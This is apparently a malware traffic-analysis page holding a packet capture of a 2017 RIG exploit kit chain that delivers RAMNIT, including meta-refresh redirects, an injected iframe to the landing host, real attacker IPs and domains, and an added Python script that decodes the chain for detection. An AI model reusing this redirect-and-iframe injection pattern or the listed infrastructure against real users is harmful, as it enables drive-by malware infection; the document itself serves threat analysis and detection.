RIG Exploit Kit EK Delivers RAMNIT RAT Malware Backdoor Banking Trojan PCAP File Download Traffic Analysis

2017-11-10 03:46:19.216224 IP 192.168.1.5.49186 > 18.195.19.123.80: Flags [P.], seq 1426946809:1426947166, ack 2995259417, win 16537, length 357: HTTP: GET /voluum/cebddddb-0f28-4087-99c3-690fa79f4804??track=48tmsGdksmgj383P=ad96939d842fae76905bea8a2c92a6dd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: flinsheer-perreene.com
Connection: Keep-Alive

2017-11-10 03:46:19.630154 IP 18.195.19.123.80 > 192.168.1.5.49186: Flags [P.], seq 1:985, ack 357, win 55, length 984: HTTP: HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Nov 2017 08:46:25 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Set-Cookie: cebddddb-0f28-4087-99c3-690fa79f4804-v4=cebddddb-0f28-4087-99c3-690fa79f4804;domain=flinsheer-perreene.com;path=/;HttpOnly
Set-Cookie: cc-v4=fdKd9Ppm4%2BiytNluXEyc%2B7WzdiZv86CuGn953Ih%2BcUORnlh%2FGtxIVL%2FxGHFZf52H%2Bg8y4tH%2BYhVgnD%2FQ7G167o3x65jJ0Wo15hD0wlA3APUh%2BavOtsYef0%2BEZ2qJn8ApbcdSu55QLICPhcoHfc2QaA%3D%3D;Max-Age=31536000;Expires=Sat, 10-Nov-2018 08:46:25 GMT;domain=flinsheer-perreene.com;path=/;HttpOnly

101
<html><head><meta http-equiv="refresh" content="0;URL='http://kcsmj.redirectvoluum.com:80/redirect?target=BASE64aHR0cDovLzE5NC41OC40MC4xOTMvdGVzdDIyLnBocA&ts=1510303585849&hash=ex3LFGjCSgEgfttwNTR51YC0Ziyrs3NbEUoU72qn5B8&rm=D'" /></head><body></body></html>
0

2017-11-10 03:46:19.694090 IP 192.168.1.5.49186 > 18.195.19.123.80: Flags [P.], seq 357:837, ack 985, win 16291, length 480: HTTP: GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: flinsheer-perreene.com
Connection: Keep-Alive
Cookie: cebddddb-0f28-4087-99c3-690fa79f4804-v4=cebddddb-0f28-4087-99c3-690fa79f4804; cc-v4=fdKd9Ppm4%2BiytNluXEyc%2B7WzdiZv86CuGn953Ih%2BcUORnlh%2FGtxIVL%2FxGHFZf52H%2Bg8y4tH%2BYhVgnD%2FQ7G167o3x65jJ0Wo15hD0wlA3APUh%2BavOtsYef0%2BEZ2qJn8ApbcdSu55QLICPhcoHfc2QaA%3D%3D

2017-11-10 03:46:19.958524 IP 18.195.19.123.80 > 192.168.1.5.49186: Flags [P.], seq 985:1416, ack 837, win 57, length 431: HTTP: HTTP/1.1 400 Bad Request
Server: nginx
Date: Fri, 10 Nov 2017 08:46:26 GMT
Content-Type: text/html
Content-Length: 166
Connection: close

2017-11-10 03:46:20.871400 IP 192.168.1.5.49188 > 52.58.173.25.80: Flags [P.], seq 2132587277:2132587671, ack 1318172949, win 16537, length 394: HTTP: GET /redirect?target=BASE64aHR0cDovLzE5NC41OC40MC4xOTMvdGVzdDIyLnBocA&ts=1510303585849&hash=ex3LFGjCSgEgfttwNTR51YC0Ziyrs3NbEUoU72qn5B8&rm=D HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: kcsmj.redirectvoluum.com
Connection: Keep-Alive

2017-11-10 03:46:21.521409 IP 52.58.173.25.80 > 192.168.1.5.49188: Flags [P.], seq 1:407, ack 394, win 110, length 406: HTTP: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
Content-Type: text/html;charset=UTF-8
Date: Fri, 10 Nov 2017 08:46:27 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Server: nginx
transfer-encoding: chunked
Connection: keep-alive

76
<html><head><meta http-equiv="refresh" content="0;URL='http://194.58.40.193/test22.php'" /></head><body></body></html>

2017-11-10 03:46:21.936294 IP 192.168.1.5.49189 > 194.58.40.193.80: Flags [P.], seq 2594930462:2594930720, ack 3987607188, win 16537, length 258: HTTP: GET /test22.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 194.58.40.193
Connection: Keep-Alive

2017-11-10 03:46:22.643433 IP 194.58.40.193.80 > 192.168.1.5.49189: Flags [P.], seq 1:802, ack 258, win 245, length 801: HTTP: HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Fri, 10 Nov 2017 08:46:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3

261
<HEAD>
</HEAD>

<BODY>

<iframe width="500" scrolling="no" height="500" frameborder="500" src="http://176.57.214.216/?MzUzMzkz&TAnQoGvMdGxc3Rvcm1lZG5ocFJpeUM=Y2FwaXRhbA==&LWNsEy=bWlzc2luZw==&LjBPUhEa=YXR0YWNrcw==&CsayYDG=bG9jYXRlZA==&xcdsfgdf=xHvQMrDYbRrFFYDfKP7EUKdEMU7WA0OKwYuZha3VF5uxFDLGpbf1FxjspV6dCFmEmvdvdLcHIwGh1UDA&WEotdm=Y2FwaXRhbA==&nrGUxgFUmJAQu=ZGVub21pbmF0aW9ucw==&RLAeqJGIKf=bG9jYXRlZA==&MpeKFPgc=ZGVub21pbmF0aW9ucw==&LgolCgPUDG=Y2FwaXRhbA==&YqLvwqqJaRzvSD=c3Rvcm1lZA==&vbnvbnd=SwAyyYxdV1lH96yr3ESAyxKdgpaH9ReNaAsQrZCRQrQ_3lj9yrMQI88mwhfWv2BYzestYlggpQtR2avI&trzMkvaGXcmVwb3J0">
</body>
0

2017-11-10 03:46:22.963527 IP 192.168.1.5.49191 > 176.57.214.216.80: Flags [P.], seq 1277188482:1277189247, ack 4060390144, win 16537, length 765: HTTP: GET /?MzUzMzkz&TAnQoGvMdGxc3Rvcm1lZG5ocFJpeUM=Y2FwaXRhbA==&LWNsEy=bWlzc2luZw==&LjBPUhEa=YXR0YWNrcw==&CsayYDG=bG9jYXRlZA==&xcdsfgdf=xHvQMrDYbRrFFYDfKP7EUKdEMU7WA0OKwYuZha3VF5uxFDLGpbf1FxjspV6dCFmEmvdvdLcHIwGh1UDA&WEotdm=Y2FwaXRhbA==&nrGUxgFUmJAQu=ZGVub21pbmF0aW9ucw==&RLAeqJGIKf=bG9jYXRlZA==&MpeKFPgc=ZGVub21pbmF0aW9ucw==&LgolCgPUDG=Y2FwaXRhbA==&YqLvwqqJaRzvSD=c3Rvcm1lZA==&vbnvbnd=SwAyyYxdV1lH96yr3ESAyxKdgpaH9ReNaAsQrZCRQrQ_3lj9yrMQI88mwhfWv2BYzestYlggpQtR2avI&trzMkvaGXcmVwb3J0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://194.58.40.193/test22.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 176.57.214.216
Connection: Keep-Alive

2017-11-10 03:46:24.969940 IP 192.168.1.5.49193 > 176.57.214.216.80: Flags [P.], seq 2174002867:2174003594, ack 3246818045, win 16537, length 727: HTTP: GET /?MTM1MTcw&AnzliBMWBYrRnbG9jYXRlZGZnTWVjeEVNU01nblg=YXR0YWNrcw==&xcdsfgdf=xXzQMvWZbRXQC53EKvjcT6NGMVHRHECL2YudmrHVefjaf1WkzrHFTF_3ozKASwSG6_FtdfJUDV&nLqQRXL=bG9jYXRlZA==&JHKaeJHCxkLKV=ZGVub21pbmF0aW9ucw==&caEDZffCL=Y2FwaXRhbA==&KwDWkGmaDeTI=c3Rvcm1lZA==&pYKNDKJoueWB=c3Rvcm1lZA==&MsrbrbOULyjg=Y2FwaXRhbA==&BBCFvkYfXqwZHxO=Y2FwaXRhbA==&HUPrrso=Y2FwaXRhbA==&vbnvbnd=C0jEWFLwRhmdxYB1gS9aurhkXVwEOd0pPU_xGLaQ9A-8GQFbRv3Qv9zrQkdMkmwheA61ENjO8e&NamupouUSuZ=cmVwb3J0&LKDlWMNIIc3Rvcm1lZA== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko
Host: 176.57.214.216
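
The four HTTP exchanges above form a redirect chain: a meta refresh from flinsheer-perreene.com to the voluum redirector (whose target parameter is a BASE64-prefixed URL), a second meta refresh to 194.58.40.193/test22.php, and finally an iframe to the exploit-kit landing URL on 176.57.214.216, whose query string is base64 filler words. The Python below is an added analysis example, not part of the original capture or of any tool: it walks the three response bodies (copied from the capture, indexed here by host/path of the request that fetched them) to rebuild the chain, checks that the voluum target decodes to the URL the redirector actually served, and decodes the landing-URL parameters, keeping the two binary blobs verbatim.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# First GET of the capture and the three response bodies, keyed by "host/path" of the request that fetched them.
FIRST_REQUEST = "http://flinsheer-perreene.com/voluum/cebddddb-0f28-4087-99c3-690fa79f4804??track=48tmsGdksmgj383P=ad96939d842fae76905bea8a2c92a6dd"
CAPTURED = {
    "flinsheer-perreene.com/voluum/cebddddb-0f28-4087-99c3-690fa79f4804":
        '<html><head><meta http-equiv="refresh" content="0;URL=\'http://kcsmj.redirectvoluum.com:80/redirect?target=BASE64aHR0cDovLzE5NC41OC40MC4xOTMvdGVzdDIyLnBocA&ts=1510303585849&hash=ex3LFGjCSgEgfttwNTR51YC0Ziyrs3NbEUoU72qn5B8&rm=D\'" /></head><body></body></html>',
    "kcsmj.redirectvoluum.com/redirect":
        '<html><head><meta http-equiv="refresh" content="0;URL=\'http://194.58.40.193/test22.php\'" /></head><body></body></html>',
    "194.58.40.193/test22.php":
        '<HEAD></HEAD><BODY><iframe width="500" scrolling="no" height="500" frameborder="500" src="http://176.57.214.216/?MzUzMzkz&TAnQoGvMdGxc3Rvcm1lZG5ocFJpeUM=Y2FwaXRhbA==&LWNsEy=bWlzc2luZw==&LjBPUhEa=YXR0YWNrcw==&CsayYDG=bG9jYXRlZA=='
        '&xcdsfgdf=xHvQMrDYbRrFFYDfKP7EUKdEMU7WA0OKwYuZha3VF5uxFDLGpbf1FxjspV6dCFmEmvdvdLcHIwGh1UDA&WEotdm=Y2FwaXRhbA==&nrGUxgFUmJAQu=ZGVub21pbmF0aW9ucw==&RLAeqJGIKf=bG9jYXRlZA==&MpeKFPgc=ZGVub21pbmF0aW9ucw=='
        '&LgolCgPUDG=Y2FwaXRhbA==&YqLvwqqJaRzvSD=c3Rvcm1lZA==&vbnvbnd=SwAyyYxdV1lH96yr3ESAyxKdgpaH9ReNaAsQrZCRQrQ_3lj9yrMQI88mwhfWv2BYzestYlggpQtR2avI&trzMkvaGXcmVwb3J0"></body>',
}

def b64_word(token):
    """Decode an unpadded, URL-safe base64 token when it yields printable ASCII; otherwise return None."""
    std = token.translate(str.maketrans("-_", "+/")) + "=" * (-len(token) % 4)
    try:
        text = base64.b64decode(std, validate=True).decode("ascii")
    except ValueError:  # binascii.Error (bad alphabet/padding) and UnicodeDecodeError both derive from ValueError
        return None
    return text if text and text.isprintable() else None

def next_hop(body):
    """Return the URL a page forwards the browser to via <meta refresh> or an <iframe>, or None."""
    m = (re.search(r"""content=["']\s*\d+\s*;\s*URL=['"]?([^'"]+)""", body, re.I)
         or re.search(r"""<iframe[^>]*\ssrc=["']([^"']+)""", body, re.I))
    return m.group(1) if m else None

def redirect_chain(first_url, bodies=CAPTURED):
    """Follow the captured bodies hop by hop and return every URL the browser was sent to."""
    chain = [first_url]
    while (u := urlsplit(chain[-1])) and (nxt := next_hop(bodies.get(f"{u.hostname}{u.path}", ""))):
        chain.append(nxt)
    return chain

def voluum_target(url):
    """Decode the BASE64-prefixed 'target' parameter of the voluum redirector URL."""
    target = dict(parse_qsl(urlsplit(url).query))["target"]
    return b64_word(target[6:] if target.startswith("BASE64") else target)

def decode_gate_query(url):
    """Decode each base64 value of the landing-URL query; tokens that are not plain text stay verbatim."""
    return {k: (b64_word(v) or v) if v else (b64_word(k) or k)
            for k, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)}
```

The decoded parameter values (capital, missing, attacks, located, denominations, stormed) are dictionary words under random keys, which is why matching on the host or the base64 word list rather than on the key names is the more stable detection signature for this chain.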

2017-11-10 03:50:08.148469 IP 192.168.1.5.49215 > 194.87.145.189.443: Flags [P.], seq 3308774346:3308774352, ack 778312377, win 16537, length 6
2017-11-10 03:50:08.494157 IP 192.168.1.5.49215 > 194.87.145.189.443: Flags [P.], seq 6:81, ack 1, win 16537, length 75
2017-11-10 03:50:09.165926 IP 194.87.145.189.443 > 192.168.1.5.49215: Flags [P.], seq 1:8, ack 81, win 457, length 7
2017-11-10 03:50:09.166127 IP 192.168.1.5.49215 > 194.87.145.189.443: Flags [P.], seq 81:87, ack 8, win 16535, length 6